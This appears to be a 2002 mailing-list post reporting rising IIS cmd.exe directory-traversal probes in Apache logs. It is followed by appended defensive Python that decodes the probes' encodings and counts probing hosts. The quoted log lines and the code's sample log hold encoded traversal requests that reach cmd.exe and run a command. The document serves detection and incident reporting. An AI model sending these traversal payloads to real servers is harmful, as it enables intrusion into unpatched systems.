increasing cmd.exe port 80/tcp probes

Jeff Anderson-Lee jonah at eecs.berkeley.edu
Sun Jun 2 17:04:37 GMT 2002


Starting on Jan 5, 2002 I've been noticing some particular probes
appearing regularly in my apache logs.  There are two patterns of
note.  The first is a single probe:

    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"

and the second is a pair of probes:

    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"

At first, seeing a new host with one of these probe patterns was a
weekly event, then later about once a day.  However, in the past thirty-six
hours I've started to see a sudden rise in the incidence of new hosts
scanning with the first pattern:

dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))


Has anyone else noticed these patterns in their logs?
Does anyone know if a virus/worm has been identified with this
probing pattern?

Jeff Anderson-Lee
System Manager, Digital Library Project
ERL, UC Berkeley
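A defender-side way to triage probes like the ones quoted above: undo the layered encoding (%255c, %252e, the overlong UTF-8 %c0%af) so all variants normalise to the same traversal, then count distinct source addresses per trick. This is an added example, not code from the original post; the log lines, hostnames and addresses inside it are constructed stand-ins in the same layout as the excerpts, and the three-round decode limit is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in the post's log layout; hosts/addresses are placeholders.
SAMPLE_LOG = r"""
dlp:a.example.net [192.0.2.10] - - [31/May/2002:22:39:46 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:192.0.2.11 [192.0.2.11] - - [31/May/2002:22:43:07 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:a.example.net [192.0.2.10] - - [01/Jun/2002:05:50:48 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:b.example.org [198.51.100.7] - - [01/Jun/2002:07:51:02 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234 ((- -> /scripts/..%c0%af../winnt/system32/cmd.exe))
dlp:b.example.org [198.51.100.7] - - [01/Jun/2002:07:51:03 -0700] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234 ((- -> /scripts/.%2e/.%2e/winnt/system32/cmd.exe))
dlp:192.0.2.50 [192.0.2.50] - - [01/Jun/2002:08:00:00 -0700] "GET /index.html HTTP/1.1" 200 1234 ((- -> /index.html))
"""

# host [ip] ident user [timestamp] "request" ...; trailing fields are ignored.
LOG_RE = re.compile(r'^\S+ \[(?P<ip>[^\]]+)\] \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)"')

def decode_path(path: str, max_rounds: int = 3) -> str:
    """Undo layered percent-encoding, fold overlong UTF-8 '/' (C0 AF) and '\\' into '/'."""
    raw = path.encode()
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:  # no encoding layer left to peel
            break
        raw = decoded
    return raw.replace(b'\xc0\xaf', b'/').decode('latin-1').replace('\\', '/')

def classify(target: str):
    """Name the evasion trick used, or None if not a traversal to cmd.exe."""
    path = decode_path(target.split('?', 1)[0])
    if '../' not in path or not path.lower().endswith('cmd.exe'):
        return None
    low = target.lower()
    if '%255c' in low:
        return 'double-encoded backslash traversal'
    if '%252e' in low:
        return 'double-encoded dot traversal'
    if '%c0%af' in low:
        return 'overlong utf-8 slash traversal'
    return 'plain traversal'

def hosts_per_pattern(log_text: str) -> dict:
    """Map each detected pattern to the set of distinct probing addresses."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        parts = m.group('req').split(' ') if m else []  # HTTP/0.9-style has no version
        label = classify(parts[1]) if len(parts) >= 2 else None
        if label:
            hits[label].add(m.group('ip'))
    return dict(hits)
```

Running `hosts_per_pattern(SAMPLE_LOG)` on the constructed sample reports two distinct hosts for the first (double-encoded backslash) pattern and one host for each half of the paired probe, with the benign request ignored.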
